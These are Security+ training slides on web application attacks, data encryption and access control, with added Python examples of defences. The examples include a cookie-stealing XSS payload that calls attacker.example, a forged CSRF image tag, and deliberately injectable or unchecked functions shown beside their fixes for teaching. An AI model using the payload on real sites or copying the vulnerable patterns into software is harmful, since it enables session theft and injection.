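The cookie flags do not stop a token from being stolen by malware on the endpoint, which is why the store still logs the user out on request and forces re-authentication for sensitive actions.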
• Exploits the trust a user has for a specific website
–The website must be vulnerable to XSS attacks
• Tricking a user into running a malicious script on their machine
–Victim must click on the attacker's URL or open the attacker's message
• Sends the victim to the XSS-vulnerable site
• Runs a script in the victim's browser
– The script runs at the permission level of the victim
–Malicious script steals session cookies or other information and sends it back to the attacker
Cross-site Scripting (XSS)
• Reflected XSS (Non-persistent)
–URL for the attack is sent to the victim in an email or other message
–URL points to a trusted (XSS vulnerable) website but also contains the malicious code
• Stored XSS (Persistent)
–Malicious code is stored on the server and displayed on social networking or other website
–Every visitor to the affected page is exposed, so it reaches far more victims than a link that each one must click
Cross-site Scripting (XSS)
Cross-site Scripting (XSS)
Cross-site Scripting Prevention
•Client Side
– Disable script execution, or allow it only for trusted sites
– Log out of all websites while not using them
– Do not use "remember me" or allow browsers to store login credentials
– Patch management of browsers and applications
– User education: don't click links in emails
•Server Side
– Secure coding and testing of webpages
• Input validation and sanitization
• Output encoding of user-supplied data for the context (HTML body, attribute, URL) it is written into
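Added example (this editor's code, not the course's) of the server-side prevention just listed: the reflected-XSS pattern from the slides beside its encoded form in Python. The payload string, the page templates and the Content-Security-Policy value are constructed for the example.

```python
import html
from urllib.parse import quote

# Constructed attacker payload: what a reflected-XSS link typically carries
XSS_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def render_search_vulnerable(query: str) -> str:
    # Reflects the raw query straight into the page: the site "echoes back"
    # whatever was in the URL, script tags included
    return f"<p>Results for: {query}</p>"


def render_search_safe(query: str) -> str:
    # Output encoding for the HTML text context: < > & " ' become entities,
    # so the browser displays the payload as text instead of executing it
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def render_link_safe(query: str) -> str:
    # Each context needs its own encoding: percent-encode for the URL,
    # then HTML-escape because the URL sits inside an attribute value
    href = "/search?q=" + quote(query, safe="")
    return f'<a href="{html.escape(href, quote=True)}">search again</a>'


def csp_header() -> str:
    # Defence in depth: even if one encoding step is missed, inline script
    # is refused by the browser under this (assumed) policy
    return "Content-Security-Policy: default-src 'self'; script-src 'self'"


def contains_script(page: str) -> bool:
    # Crude check used by the self-test; it is not a sanitizer
    return "<script" in page.lower()
```

Encoding happens at output, not at input: the same string "O'Brien" is legitimate in a name field and only becomes dangerous when it is written into a page without escaping.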
• Exploits the trust that a website has for a user's browser
• Requests are sent to the web server from a trusted user that were not authorized by the user (victim)
• Victim must have an open session or unexpired cookie with the target website at the time of attack
• Attack is initiated when the victim clicks on or opens something from the attacker
–URL links in social networking or email
– Image tags
Cross-site Request Forgery (XSRF or CSRF)
• Attacker targets forms or other actions on the website
–Must know exactly what info the website will ask for
• Attack may:
–Change the email address and password to hijack the account
–Perform any other state-changing action the victim is authorized to perform
–Transfer money
Cross-site Request Forgery (XSRF or CSRF)
Cross-site Request Forgery Prevention
•Client Side
– Disallow social networking website access
– Log out of all websites while not using them
– Do not use "remember me"
•Server Side
– Header checking (Origin/Referer must name your own site)
– Unpredictable anti-CSRF tokens in forms, tied to the user's session
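Added example (this editor's code, not the course's) of the server-side CSRF prevention above: a per-session token that the forged request cannot carry, plus the Origin/Referer check, in Python. The shop.example origin, the transfer form and the attacker page are constructed for the example.

```python
import hashlib
import hmac
import secrets
from typing import Mapping

# Per-deployment secret and site origin; both are assumptions for this example
SERVER_SECRET = secrets.token_bytes(32)
SITE_ORIGIN = "https://shop.example"

# Constructed attacker page: the browser attaches the victim's session cookie
# to this request, which is why the cookie alone must not authorize a transfer
ATTACKER_PAGE = (
    '<img src="https://shop.example/transfer?to=mallory&amount=1000" '
    'width="1" height="1">'
)


def csrf_token_for(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    # Token derived from the session: the attacker's page can cause the
    # request but cannot read this value from another origin to include it
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id: str, presented: str, secret: bytes = SERVER_SECRET) -> bool:
    # Constant-time comparison so response timing does not leak the token
    return hmac.compare_digest(csrf_token_for(session_id, secret), presented)


def origin_allowed(headers: Mapping[str, str], site: str = SITE_ORIGIN) -> bool:
    # Header checking: the browser sets Origin/Referer itself and script on
    # another site cannot override them
    origin = headers.get("Origin")
    if origin is not None:
        return origin == site
    referer = headers.get("Referer")
    if referer is not None:
        return referer == site or referer.startswith(site + "/")
    return False  # neither header present: refuse to perform a state change


def accept_transfer(session_id: str, form: Mapping[str, str],
                    headers: Mapping[str, str]) -> bool:
    # Both checks must pass; a valid session cookie proves only that the
    # browser is logged in, not who initiated the request
    if not origin_allowed(headers):
        return False
    return csrf_token_valid(session_id, form.get("csrf_token", ""))


def render_transfer_form(session_id: str) -> str:
    # The token rides in the form body, never in a cookie the browser
    # would attach automatically
    token = csrf_token_for(session_id)
    return (f'<form method="post" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            f'<input name="to"><input name="amount"><button>Send</button></form>')
```

Note the dependency on the XSS material above: a script running on the vulnerable site itself can read the token out of the form, so anti-CSRF tokens only hold if the site is also free of XSS.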
Cross-site Scripting vs. Request Forgery
XSS flow (diagram on the slide):
1. Attacker finds an XSS-vulnerable site: a website that dynamically creates pages using unsanitized user input
2. Attacker sends the victim a URL for that site with the malicious script inside
3. Victim clicks on the link to visit the site
4. The site echoes back the malicious script
5. The script runs in the victim's browser, stealing the victim's cookie
CSRF flow (diagram on the slide):
1. Attacker uses social engineering to get the victim to click on a link that contains the attack
2. The attack uses an unexpired session ID on the victim's computer to interact with the web server (a social networking site in the diagram)
3. The web server processes the forged request as usual
Injection Attacks
Attack Type (Also Called): Description
SQL Injection (SQL Insertion, SQLi): Entering malicious text/commands either along with or instead of the expected user input to manipulate the database or return unauthorized information
LDAP Injection (Lightweight Directory Access Protocol Injection): Exploiting a weak LDAP instance by entering unexpected user input that executes commands, returns unauthorized data, or modifies content
XML Injection (XPath Injection): Using XPath to exploit XML vulnerabilities and return data that was not intended or expected by the data owner
Command Injection (Code Injection): Inserting commands into an application through user input. Used in directory traversal and other attacks against both the server and the client
When user-supplied data is used to dynamically create commands without validation and sanitization, injection attacks can occur.
• Secure coding practices
–Proper type assignment for variables and parameters
–Parameterized queries (prepared statements) so user input is bound as data and never concatenated into the command
– Input validation / filtering / sanitization
• Validate all user input to make sure it is exactly what is expected
• Filter out all commands, escape characters, nulls, and parameters of the wrong type
• Vulnerability scanning and fuzzing
• Patch management
Preventing Injection Attacks
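Added example (this editor's code, not the course's) of the SQL injection row of the table and its prevention: a login query built by string formatting beside the parameterized version, plus an allowlist check for the one place parameters cannot be used, a column name in ORDER BY. The in-memory SQLite table and its two users are constructed sample data.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    # Constructed sample data, in memory so the example runs offline
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> List[Tuple]:
    # String formatting lets the input become part of the SQL grammar:
    # a quote and a comment marker rewrite the WHERE clause
    sql = (f"SELECT id, name FROM users "
           f"WHERE name = '{name}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_safe(conn: sqlite3.Connection, name: str, password: str) -> List[Tuple]:
    # Parameters are bound by the driver; whatever the input contains,
    # it is compared as a value and never parsed as SQL
    sql = "SELECT id, name FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchall()


_ALLOWED_SORT_COLUMNS = {"id", "name"}


def sort_column_is_allowed(column: str) -> bool:
    # Identifiers cannot be parameterized, so the only safe approach is an
    # allowlist of exactly the values the application expects
    return column in _ALLOWED_SORT_COLUMNS


def list_users_sorted(conn: sqlite3.Connection, column: str) -> List[Tuple]:
    if not sort_column_is_allowed(column):
        raise ValueError(f"unexpected sort column: {column!r}")
    return conn.execute(f"SELECT name FROM users ORDER BY {column}").fetchall()
```

The same principle carries to the LDAP, XPath and OS-command rows of the table: use the API that separates code from data where one exists, and fall back to strict allowlisting where it does not.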
• More data is sent to an application than it can process or store in the buffer
– Junk data
–Malicious commands
• Results:
–Application crash
–Good data overwritten
–Executing code with escalated privileges
–Changes in application behavior
Buffer Overflow
Buffer Overflow Attack
Prevention
•Patch management
•Vulnerability testing
•Secure coding practices and testing
• Java Applets
–Run in a virtual machine/sandbox on the client
–Applets can escape the sandbox of a flawed Java virtual machine (JVM)
–Only run Java Applets from tested and trusted websites and vendors
• JavaScript
–Executable and potentially dangerous
–Browsers do have built-in policies for what JavaScript is allowed to do
–Tools available to help control which JavaScripts are allowed
• Security Zones in Internet Explorer
• NoScript Firefox plug-in (advanced users)
Java Applets and JavaScript
• Microsoft's version of applets
• Stored and run directly on the local machine – not in a sandbox
• Runs with the permission level of the logged in user
• Should be digitally signed (Authenticode)
–You know who the author is
–You know it has not been tampered with
–Do not allow unsigned ActiveX controls
• Even signed ActiveX have been known to have security holes
• Keep browser prompts on for ActiveX downloading and running in all IE Security Zones
• Educate your users about ActiveX browser prompts
ActiveX Controls
• Browser add-ons can be a good thing
–Add functionality to your browser
• Many add-ons are not authored by the browser creator
–Anyone can download the SDK and create an add-on
• Browser creators do attempt to keep malware out of add-ons
• Research and test an add-on before using it in your production environment
Malicious Add-ons
• Security Zones
• Protected Mode
• InPrivate Browsing
• Tracking Protection
• ActiveX Filtering
• Cross-site Scripting Filter
Internet Explorer Security Settings Demonstration
• Email attachments are a security threat
• A very common attack vector
• Could contain virus, worms, trojans, or other malware
• May be part of phishing or social engineering attacks
Attachments
Preventing Attacks
Through Attachments
•Do not allow script or executable attachments
•Consider disallowing all attachments
•User education – do not open attachments unless you were expecting that attachment from someone you know
•Run all attachments through an antivirus scanner
• Attackers taking advantage of a newly found vulnerability before the developer can release a patch
• Often happens before you realize it
• If known, turn off that application or service until a patch is released
• Your other layers of security can help mitigate these attacks
Zero Day Exploits
Application Security
• Error and exception handling
–An exception is an error condition raised at run time, often one the programmer did not foresee
–Explicitly program what should happen in all possible cases
• Including a catch-all general case
–Program in "human" error messages so that raw exception text, stack traces, or error codes are not displayed to the end-user
• Gives away too much information
• Input validation
–Ensure that all user-supplied input is exactly what is expected and all other characters are not allowed
Secure Coding Concepts
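Added example (this editor's code, not the course's) of the two secure coding concepts above in Python: allowlist input validation, an explicit handler for the errors that are expected, and a catch-all that logs the full traceback under a reference id while the user sees only a generic message. The username policy, the order handler and its inventory are assumptions made for the example.

```python
import logging
import re
import traceback
import uuid
from typing import Callable, Dict, Tuple

log = logging.getLogger("app")


class InputError(ValueError):
    """Raised by validators: the only exception whose text reaches the user."""


USERNAME_RE = re.compile(r"[a-z][a-z0-9_]{2,31}")   # assumed policy: 3-32 chars


def validate_username(value: str) -> str:
    # Allowlist validation: accept exactly what is expected, reject the rest
    if not USERNAME_RE.fullmatch(value):
        raise InputError("invalid username")
    return value


def validate_quantity(value: str, lo: int = 1, hi: int = 100) -> int:
    # Digits only (no sign, spaces or exponent), then a range check
    if not re.fullmatch(r"[0-9]{1,3}", value):
        raise InputError("invalid quantity")
    n = int(value)
    if not lo <= n <= hi:
        raise InputError("quantity out of range")
    return n


INVENTORY = {"widget": 10}   # constructed sample data


def order_handler(form: Dict[str, str]) -> str:
    user = validate_username(form.get("user", ""))
    qty = validate_quantity(form.get("qty", ""))
    stock = INVENTORY[form.get("item", "")]   # KeyError on an unknown item: unforeseen
    if qty > stock:
        raise InputError("not enough stock")
    return f"{user} ordered {qty} x {form['item']}"


def handle_request(handler: Callable[[Dict[str, str]], str],
                   form: Dict[str, str]) -> Tuple[int, str]:
    """Run a handler and never let internal error detail reach the client."""
    try:
        return 200, handler(form)
    except InputError as exc:
        # Expected, user-correctable problem: a plain human message
        return 400, f"Request rejected: {exc}"
    except Exception:
        # Catch-all for everything not foreseen: the traceback goes to the
        # server log under a correlation id; the user sees only the id
        ref = uuid.uuid4().hex[:12]
        log.error("unhandled error ref=%s\n%s", ref, traceback.format_exc())
        return 500, f"Something went wrong. Reference: {ref}"
```

The reference id is what support staff use to find the logged traceback; the traceback itself (file paths, table names, library versions) stays off the wire.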
• Technique of inputting unexpected values into applications to see what happens
–Random, invalid, unanticipated
• Results can be
–Client-side crash
–Server-side crash
–Unauthorized access to data
• Automated tools are available
• Can be an attack if done by an unauthorized person
• Utilize fuzzing in your environment before an attacker does
–Time consuming but worth it
Fuzzing
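Added example (this editor's code, not the course's) of the technique described above: a small mutation fuzzer that feeds random, invalid and unanticipated inputs to a parser and records which exceptions escape. The record format and its deliberately missing bounds check are constructed for the example; the hardened parser shows what the finding should turn into.

```python
import random
from typing import Callable, Dict


def parse_record(data: bytes) -> bytes:
    """Constructed wire format: [len:1][payload:len][checksum:1].
    Bounds checks are missing on purpose, the kind of bug fuzzing finds."""
    n = data[0]
    payload = data[1:1 + n]
    checksum = data[1 + n]              # IndexError when the input is truncated
    if sum(payload) % 256 != checksum:
        raise ValueError("bad checksum")
    return payload


def parse_record_hardened(data: bytes) -> bytes:
    # Every assumption about the input is checked before it is indexed, and
    # a malformed record is rejected with the parser's own error
    if len(data) < 2:
        raise ValueError("record too short")
    n = data[0]
    if len(data) != n + 2:
        raise ValueError("length field does not match record size")
    payload = data[1:1 + n]
    if sum(payload) % 256 != data[1 + n]:
        raise ValueError("bad checksum")
    return payload


def make_record(payload: bytes) -> bytes:
    return bytes([len(payload)]) + payload + bytes([sum(payload) % 256])


def mutate(rng: random.Random, seed_input: bytes) -> bytes:
    # Three classic mutations: corrupt a byte, truncate, append junk
    data = bytearray(seed_input)
    op = rng.choice(("flip", "truncate", "extend"))
    if op == "flip":
        data[rng.randrange(len(data))] = rng.randrange(256)
    elif op == "truncate":
        del data[rng.randrange(len(data)):]
    else:
        data += bytes(rng.randrange(256) for _ in range(rng.randrange(1, 8)))
    return bytes(data)


def fuzz(target: Callable[[bytes], bytes], seed_input: bytes,
         iterations: int = 500, seed: int = 1) -> Dict[str, bytes]:
    """Return {exception type: first input that triggered it}.
    ValueError is the parser's own, expected rejection and is not a finding."""
    rng = random.Random(seed)       # fixed seed so a run can be reproduced
    findings: Dict[str, bytes] = {}
    for _ in range(iterations):
        case = mutate(rng, seed_input)
        try:
            target(case)
        except ValueError:
            continue
        except Exception as exc:
            findings.setdefault(type(exc).__name__, case)
    return findings
```

In a memory-unsafe language the same missing check is an out-of-bounds read or write rather than a Python exception, which is why fuzzing is paired with crash detection and memory sanitizers in practice.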
• Keep up with application patch management
–Regularly research, test, install, audit, and document updates to the applications in your environment
• Updates may reset your configurations
–Hotfixes, patches, upgrades, new versions
–Application updates come from the application vendor
–Once a vulnerability is found attackers will exploit it
• Remove programs that are no longer used
• Restrict access to only the users that need each application for their job
Application Hardening
• Have, maintain, and use application configuration baselines
– For performance and security
–The application's author and third-party authorities often offer best practice guidelines
–Use baselines when an application is deployed
• Creates consistency
– Frequently recheck for continued compliance
• Secure all your management consoles against unauthorized access
–Change default account
–Strong passwords
– Log out when not using
–Consider third-party or secondary authentication
Application Hardening
Key Terms You Should Know
Term Definition
Cookies Little text files that are created by websites and stored by the web browser that contain information about the user
Session Hijacking An unauthorized third-party stealing and using a session token and impersonating the rightful user
Header Manipulation Changing fields in the header to carry out various attacks
Cross-site Scripting Tricking users into running malicious scripts on their machine. Used to steal cookies and other info
Cross-site Request Forgery
Forged requests are sent to a web server from a trusted user that were not authorized by the user
Key Terms You Should Know
Term Definition
SQL Injection Using unexpected user input that is not properly validated and sanitized to exploit SQL
LDAP Injection Using unexpected user input that is not properly validated and sanitized to exploit LDAP
XML Injection Using unexpected user input that is not properly validated and sanitized to exploit Xpath/XML
Command Injection Inserting commands into user input fields in order to exploit the application; used to carry out directory traversal attacks
Directory Traversal The attacker is able to gain access to directories outside of what is authorized. The attacker gets to the website's root or, even worse, the OS root directory
Key Terms You Should Know
Term Definition
Buffer Overflow The application is given more data than it can process and store in the buffer. Leads to malicious code being written outside the designated buffer area
Malicious Add-ons Browser add-ons that include malicious code
Zero Day Exploits Attackers taking advantage of a vulnerability before a patch is released
Key Terms You Should Know
Term Definition
Error and Exception Handling
A secure coding practice where all errors are accounted for and any exceptions will be handled gracefully with a “human” error message
Input Validation The practice of making sure user-supplied input is of exactly the type and length that is expected so no code or unexpected characters are accepted
Fuzzing The practice of entering in random or unexpected data into user input fields to find vulnerabilities and exceptions
What We Covered
Application Attacks and Vulnerabilities
Cookies
Session Hijacking
Header Manipulation
Cross-site Scripting
Cross-site Request Forgery
Injection Attacks
Buffer Overflow
Java Applets and JavaScript
ActiveX Controls
Malicious Add-ons
Attachments
Zero Day Exploits
What We Covered
Application Security
Secure Coding Concepts
Fuzzing
Application Hardening
• Patch Management
• Configuration Baseline
CompTIA Security+ Training Instructor: Lisa Szpunar
Data Security
In This Lesson:
Data Loss Prevention (DLP)
Software-based Data Encryption
• Individual Files/Folders
• Full Disk/Whole Disk
• Database
• Removable Media
• Mobile Devices
Hardware-based Data Encryption
• Trusted Platform Module (TPM)
• Hardware Security Module (HSM)
• USB Encryption
• Hard Drive Encryption
Data Encryption Key Management
Data in the Cloud
Exam Objective:
4.3 Explain the
importance of data security
• Making sure your data is available and not being accessed by unauthorized people or systems
– Internal or external breaches
• DLP systems monitor and report on data
• Best to monitor data in all locations
–At rest
– In transit/motion
– In use
• Examples
–Microsoft Forefront
–MyDLP
Data Loss Prevention (DLP)
DLP System Functions
Availability: Not deleted or moved
Confidentiality: Not sent in email or put on removable media
Access Control: Watches for unauthorized access
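Added example (this editor's code, not the course's) of the data-in-motion monitoring a DLP system performs: a Python content scanner that looks for payment card numbers in an outbound message, uses the Luhn check digit to discard look-alike numbers, and masks what it reports. The regular expression, the block/allow policy and the sample e-mail lines are constructed for the example.

```python
import re
from typing import List, Tuple

# Runs of 13-19 digits, optionally separated by single spaces or dashes
PAN_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")


def luhn_valid(digits: str) -> bool:
    # Luhn check digit: weeds out order numbers and phone numbers that merely
    # look like a card number, which keeps the false-positive rate down
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(digits: str) -> str:
    # Report the hit without copying the full number into the DLP log
    return "*" * (len(digits) - 4) + digits[-4:]


def find_pans(text: str) -> List[str]:
    hits = []
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            hits.append(digits)
    return hits


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, masked PAN) for each line carrying a card number."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        for pan in find_pans(line):
            findings.append((lineno, mask_pan(pan)))
    return findings


def policy_decision(lines: List[str]) -> str:
    # Data in motion: a match blocks the outbound message instead of only reporting it
    return "block" if scan_lines(lines) else "allow"


# Constructed outbound e-mail body used as sample input
SAMPLE_OUTBOUND = [
    "Subject: booking confirmation",
    "Hi, my customer number is 1234 5678 9012 3456, please update it.",
    "Card for the booking: 4111 1111 1111 1111 exp 12/29",
    "Call me on 555 0100 2345 if anything changes.",
]
```

Pattern matching is only one DLP technique; commercial products add fingerprinting of known documents and classification labels, but the scan-and-decide loop looks the same.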
Software-based Data Encryption
Encrypting specific files/folders where they are stored or for confidentiality during transit
• End user controlled
• Encryption/decryption is done by the file system or application
• The file/folder stays encrypted if it is moved
• Often includes access control
Individual Files/Folders
Encrypting specific files/folders where they are stored or for confidentiality during transit
• Examples:
–Windows Encrypting File System (EFS)
–Microsoft Office
–Many third-party providers have moved to whole disk encryption
Individual Files/Folders
Encrypting an entire physical hard disk or logical volume
• The entire volume is encrypted including the file system
• Can be transparent to the end user
• Data is only protected while it is on the encrypted drive
• Examples:
–Microsoft’s BitLocker
–Mac's Disk Utility creates encrypted virtual disk images (FileVault encrypts the whole startup disk)
–TrueCrypt
–Pretty Good Privacy (PGP)
Full Disk/Whole Disk
Can be whole database-level encryption or encrypt only specific rows, columns, fields, cells, etc.
• Protects the data “at rest”
• Might be mandatory for regulatory compliance
• Is done either by the DB management system or by a separate encryption server
• Examples:
–Microsoft SQL Server’s Transparent Data Encryption (TDE)
Database
Encrypting the data on removable media like CDs and DVDs and portable devices like USB drives, SD cards, and external hard drives
• Helps protect data if the device is lost or stolen
• Encryption software is often included on USB and removable hard drives
–User controlled
–Great for personal use
• An enterprise-wide solution transfers control to administrators
–Often included with a full featured enterprise encryption solution
– Look for logging and auditing capabilities
–May include remote management
Removable Media
Encrypting the data on digital phones, PDAs, and tablets
• Helps protect data if the device is lost or stolen
• Platform specific apps are available to encrypt and password protect mobile devices
• Enterprise solutions are available that work across platforms
• Remote wipe functionality is often included
Mobile Devices
Hardware-based Data Encryption
• The TPM specification is a standard created by the Trusted Computing Group
• A built-in physical TPM chip stores keys, passwords, or certificates for encryption
• Includes a cryptographic processor
• Adds extra security to software-based encryption by storing keys on a separate hardware chip
• Used for disk encryption, password protection, software licensing enforcement, and configuration integrity checking
Trusted Platform Module (TPM)
• Physical device (often a PCI card or a network-attached appliance)
• Used in larger environments
• Offloads cryptographic processes to save CPU resources
• Stores keys separate from the protected data
• Includes key management
–Often used by the certificate authority in public key infrastructure systems
Hardware Security Module (HSM)
• Encryption that is done by a chip built in to the USB drive or external USB hard drive
–Whole device encryption for the data on the USB drive
• Also used as key/token for authentication or encryption of the device you plug the USB drive into
USB Encryption
• Hardware-based encryption built into a hard drive
or
• A separate device that sits between the hard drive and motherboard
• Invisible to the user and operating system
• Separates the key from the data and operating system
Hard Drive Encryption
• Where and how is the key stored
–At the same location as the data (less secure)
–On separate hardware
• Who has access to keys and passwords
–Attacks can happen from internal employees or contractors
–Your solution should support the ability to share encrypted files
• Strong password policies in use
• What happens if the key is lost
–Key backup
• Protect keys through their entire life-cycle
Encryption Key Management
• Know what happens to your data when it leaves your network
–Software as a service
–Platform as a service
– Infrastructure as a service
• May affect regulatory compliance
• Encrypt data in transit with SSL/TLS or a VPN
• Consider encrypting data before it leaves your network
Data in the Cloud
Key Terms You Should Know
Term Definition
Encrypting File System (EFS)
NTFS file/folder level encryption built into Windows operating systems
Trusted Platform Module (TPM)
A chip built into laptops and other devices that creates and stores keys for encryption
Hardware Security Module (HSM)
A hardware device that performs encryption and key management
What We Covered
Data Loss Prevention (DLP)
Software-based Data Encryption
• Individual Files/Folders
• Full Disk/Whole Disk
• Database
• Removable Media
• Mobile Devices
Hardware-based Data Encryption
• Trusted Platform Module (TPM)
• Hardware Security Module (HSM)
• USB Encryption
• Hard Drive Encryption
Data Encryption Key Management
Data in the Cloud
CompTIA Security+ Training Instructor: Lisa Szpunar
Authentication, Authorization, and
Access Control
In This Lesson:
Authentication and Authorization
Identification vs. Authentication
Authentication and Authorization
Something You Know, Something You Have, and Something You Are
• Passwords
• Tokens
• Smart Cards
• Common Access Cards (CAC)
• Personal Identification Verification Cards (PIV)
• Biometrics
Single Factor vs. Multifactor Authentication
In This Lesson:
Access Control
Key Terms You Should Know
Types of Access Control
• Mandatory Access Control (MAC)
• Discretionary Access Control (DAC)
• Role-based Access Control (RBAC)
• Rule-based Access Control (RBAC)
Information Models
Exam Objectives:
5.2 Explain the fundamental concepts and best practices related to
authentication, authorization, and access control
Policies and Best Practices
Mandatory Vacations
Job Rotation
Separation of Duties
Trusted OS
Authentication and Authorization
• Identification
–The actual identity of the user is verified
–A human has confirmed that the person with the credentials is the owner of them
• Driver’s license
• Employee ID card
• Authentication
–User knows or has the authentication credentials
• Username, password
–That user should be but is not guaranteed to be the true owner of the credentials
–Even the credential owner’s real identity may be anonymous
Identification vs. Authentication
• Authorization
–Permitting or denying access
–Access control or authentication system defines what level of access a particular authenticated user has
–Subject to rules like time of day restrictions
• Allows access to only specific times and days
• Protects systems from attacks while no one is working
• A user must be authenticated before they can do/access what they are authorized
Authentication and Authorization
Something You Know, Something You Have, and Something You Are
Authentication by Knowledge (Type I)
• A string of characters entered from memory
–Passwords
–PIN
–Pass codes
–Pass phrases
–Security questions
–Combinations
• Can be stolen, guessed, or cracked
• Have strong password policies
Something You Know, Something You Have, and Something You Are
Authentication by Ownership (Type II)
• Keys
–To open locked doors and cabinets
• Tokens
–Hold information about the user like access privileges
–Digital (session token)
• Issued by the system at authentication
• To be used for that session
–Physical Hardware (security token)
• Many forms:
– Keychain fob, USB dongle, scan card
• Often a one-time password generator
– RSA SecurID
Something You Know, Something You Have, and Something You Are
Authentication by Ownership (Type II)
• Smart Cards
–A physical card
–Stores access permissions and other data
–Hard to duplicate but easy to steal
• Often blank, so if lost the finder doesn't know who it belongs to or where to use it
• Used along with a PIN
– Lockout happens if the incorrect PIN is entered too many times
–Common Access Cards (CAC)
• US Department of Defense
• Identification and authorization
– Access to computers
– Signing email
– PKI
–Personal Identification Verification Cards
–Also called Personal Identity Verification Card (PIV)
– For U.S. government employees and contractors
–Physical access to government buildings
– Logical access to government information systems
Something You Know, Something You Have, and Something You Are
Authentication by Characteristic (Type III)
• Biometrics
–Use a unique biological trait as the authentication credential
• Fingerprint, handprint, retina scan, facial recognition
–Starting to include behavior traits as well as physical ones
–Can be built into laptops and other devices
–Can be used for physical access to buildings or rooms
–Concerns
• False positives and false negatives
• Inability to change your “password” if it is stolen
• Privacy issues
• Single Factor Authentication
–Only one type of authentication value is checked
–Example: Username and Password
• Multifactor Authentication
–More than one type of authentication happens
–Example: Username and Password + Smart Card scan
• Identity Proofing
–Answering an additional question
• When you forget your password
• When logging in from a new computer
Single Factor vs. Multifactor Authentication
Access Control
Key Terms You Should Know
• Permissions, Privileges, or Rights
–The level of access granted to users, groups, and roles
• Objects
– Files
– Folders
–Printers
–Applications
–Databases
• Subjects
–Users
–Processes
–Services
• Mandatory Access Control (MAC)
–Access is predefined and inflexible
–Controlled by administrators
–Users can’t choose to share objects themselves
–More secure but less flexible
–More management overhead, which can fall into disrepair
Types of Access Control
MAC Example
Military Classifications
•Use of data labels like Secret or Top Secret
•Users have a clearance level and can only access data at that level
• Discretionary Access Control (DAC)
–Allows users to share objects with other users
–More flexible
– Less secure
Types of Access Control
DAC Example
Unix Permissions
•Each object has three permission classes: owner, group, and other
•The owner of an object sets the permissions for each class: read, write, or execute
• Role-based Access Control (RBAC)
–Permissions are set based on roles
–A person/subject can be added to one or more role groups
–Simplifies administration
–When a person’s role changes so does his/her permissions
Types of Access Control
RBAC Example
Microsoft Active Directory
•Users and computers are put into groups based on their job role
•Permissions are set per group
• Rule-based Access Control (RBAC)
–Access is determined by a set of rules
–Access control lists (ACLs) list who can access what
• Implicit Deny rejects anything not explicitly allowed by the list
Types of Access Control
RBAC Example
Firewall Rules
•A list of rules that specify what is permitted through the firewall under what conditions
• IP addresses, ports, sources, destinations, and others
• Bell-LaPadula
– Focus on confidentiality
–No read-up (Simple Security Property)
–No write-down (*-property)
Information Models
Classification levels shown on the slide, lowest to highest: Unclassified, Confidential, Secret, Top Secret
• Biba
– Focus on integrity
–No read-down (Simple Integrity Axiom)
–No write-up (*-Integrity Axiom)
Information Models
Integrity levels shown on the slide, lowest to highest: Unverified, Trusted, Confirmed
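Added example (this editor's code, not the course's) of the Bell-LaPadula and Biba rules from the two slides above as a small reference monitor in Python. The levels are the labels drawn on the slides; the reference_monitor function and its "denied: ..." wording are assumptions made for the example.

```python
from typing import Dict, Tuple

# Labels as drawn on the slides; the numeric rank gives the lattice order
CONFIDENTIALITY: Dict[str, int] = {"Unclassified": 0, "Confidential": 1,
                                    "Secret": 2, "Top Secret": 3}
INTEGRITY: Dict[str, int] = {"Unverified": 0, "Trusted": 1, "Confirmed": 2}


def blp_can_read(subject_clearance: str, object_label: str) -> bool:
    # Simple security property: no read up
    return CONFIDENTIALITY[subject_clearance] >= CONFIDENTIALITY[object_label]


def blp_can_write(subject_clearance: str, object_label: str) -> bool:
    # *-property: no write down (a Secret process must not copy data into
    # a Confidential file, even by accident)
    return CONFIDENTIALITY[subject_clearance] <= CONFIDENTIALITY[object_label]


def biba_can_read(subject_integrity: str, object_integrity: str) -> bool:
    # Simple integrity axiom: no read down (don't consume lower-integrity input)
    return INTEGRITY[subject_integrity] <= INTEGRITY[object_integrity]


def biba_can_write(subject_integrity: str, object_integrity: str) -> bool:
    # *-integrity axiom: no write up (don't contaminate higher-integrity data)
    return INTEGRITY[subject_integrity] >= INTEGRITY[object_integrity]


def reference_monitor(model: str, subject_level: str, object_level: str,
                      operation: str) -> Tuple[bool, str]:
    """Mediate one access request and name the rule that decided it."""
    rules = {
        ("blp", "read"): (blp_can_read, "no read up"),
        ("blp", "write"): (blp_can_write, "no write down"),
        ("biba", "read"): (biba_can_read, "no read down"),
        ("biba", "write"): (biba_can_write, "no write up"),
    }
    check, rule = rules[(model, operation)]
    allowed = check(subject_level, object_level)
    return allowed, "allowed" if allowed else f"denied: {rule}"
```

Read the two models side by side: Bell-LaPadula lets information flow only upward in confidentiality, Biba only downward in integrity, which is why a system that needs both ends up with two independent sets of labels.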
• Clark-Wilson
–Constrained data items are only accessed through transformation procedures
–Different applications for read and write
–Separation of duty
Information Models
Policies and Best Practices
• Helps prevent and uncover misuses or illegal activities by internal employees
• Lets others at the company see what that employee does
• An audit can be performed while the employee is away
• Acts as a deterrent if employees know about the vacations and audits
• May only be mandated for higher ranking or those with financial responsibilities
Mandatory Vacations
• Employees are moved between two or more jobs in a scheduled system
• Helps prevent and uncover misuses or illegal activities by internal employees
• Also provides redundant skills and reduces boredom
• Does not work well in smaller companies
Job Rotation
Rotation shown on the slide: Database Admin, Website Admin, Network Admin
• Limits misuse of systems and data
